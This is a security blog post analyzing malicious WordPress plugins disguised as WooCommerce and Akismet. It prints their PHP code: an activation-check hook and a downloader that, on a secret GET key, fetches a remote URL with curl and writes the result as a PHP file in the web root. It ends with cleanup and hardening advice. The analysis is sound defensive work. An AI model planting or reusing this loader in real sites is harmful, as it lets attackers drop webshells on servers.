Malware plugin’s to WordPress (woocomerce & aksimet)

When WordPress website user account compromised, there is possibility upload plugins. We have seen new malware plugins for WordPress which are named with woocomerce and aksimet. These plugins not have anything doing with real plugins, which are woocommerce and akismet.

Both of these plugins use WordPress add_action(‘init’,”) function to activate itself and ready take commands from attacker. These both primary target is just check that plugin is activated and download from attacker webshells and malware to server.

First add_action function

add_action('init', 'wordpress_testAtivation');
function wordpress_testAtivation(){
    if($_GET['key']=='testActivation'){
        echo 'ActivatedSuccess';
        exit;
    }
}

Other add_action functions

add_action('init', 'wordpress_download');
add_action( 'pre_current_active_plugins', 'wordpress_plug_view_control' );
add_action( 'admin_head', 'wordpress_plug_view_js');

wordpress_download add_action

This part of malware takes commands from URL GET parameter and use PHP Curl command to remote download malware and write file to server.

function wordpress_download(){
    if($_GET['key']=='************'){
        function wordpress_file_func($path, $data){
            file_put_contents($path, '*************************'.$data);
        }
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $_GET['***']);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch,CURLOPT_TIMEOUT,60);
        $data = curl_exec($ch);
        $dsdsvxz = $data.'';
        wordpress_file_func($_SERVER["DOCUMENT_ROOT"].'/'.$_GET['*********'].'.php', $dsdsvxz);

    }
}

We seen this kind files written to server, which one part is random string:

wp-register-5bee02a00d46e5bee02a00d4bb.php
wp-register-5bed5f9b0729a5bed5f9b072fd.php

Final Words

Use Malware Expert – Signatures detect this malware from web server files for FREE! Also make sure you change leaked user account password and also check that there is no added extra users, if there is so then remove them.

Only way protects this kind attack’s is, if user password leaked, start using Two-Factor authentication (2FA).

Web servers that using Mod_Security with Malware.Expert – ModSecurity rules are protected against other attacks.